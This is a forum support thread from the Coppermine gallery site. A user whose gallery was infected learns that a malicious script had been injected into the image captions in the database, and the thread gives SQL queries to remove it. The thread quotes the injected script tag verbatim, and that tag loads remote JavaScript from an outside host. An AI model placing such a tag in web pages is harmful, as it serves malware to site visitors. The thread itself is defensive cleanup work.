forum.coppermine-gallery.net
Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: redbjork on March 27, 2009, 12:43:01 am
-
Hello and thank you for a great product.
A couple of days ago I was struck with malware on my coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new
So I thought I had cleaned the site using winmerge and the guide plus upgrading to latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with a malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. Only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded avast and updated to latest version. And found some evil code
(attached file)
This is the interesting part
<!-- BEGIN caption -->
<tr>
<td class="tableb"><center>
<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
</center></td>
</tr>
<!-- END caption -->
Problem is that I can not find this code on my site (searched every file on site for this text without luck). This is generated some how from what I do not know.
Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0
Any assistance would be appreciated.
-
That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.
-
Thank you so much ;D
I opened my phpmyadmin and did a search on the adress
I found the following
6027 match(es) inside table cpg149_pictures
Now I have a couple of questions.
1. How do I clean this? Im no expert in myphpadmin, but I guess that I could individually remove each line of code 6027 times. Im guessing there is a faster way.
2. Do any one know how this happen. Yes this is lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of coppermine, but now itīs upgraded.
3. How do I stop this from happening again? Any tip would be welcome.
I have included two files to assist you in your anwsers.
The exported cpg149_pictures database and myphpinfo from coppermine.
And thank you again.
-
Run this query in phpmyadmin to clean the captions:
UPDATE cpg149_pictures SET caption = ''
-
If ill run
UPDATE cpg149_pictures SET caption = ''
Donīt that remove all the comments also? I just want to remove the bad code.
Thank you for the help again.
-
Asked a friend that knows msql
He gave me this code to run
UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'
That worked like a charm :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.
So now to question 2 and 3? Any ideas?
I just want everything to be up to specs. And for all other people that will or has the same problem.
Thank you for all your help, im impressed by the speed I recived help.
-
The fields "caption" and comments posted on a file (residing in another table) are different animals.
-
Ah ok, well I was unshure, so I guess both of the queries would have worked then. ::)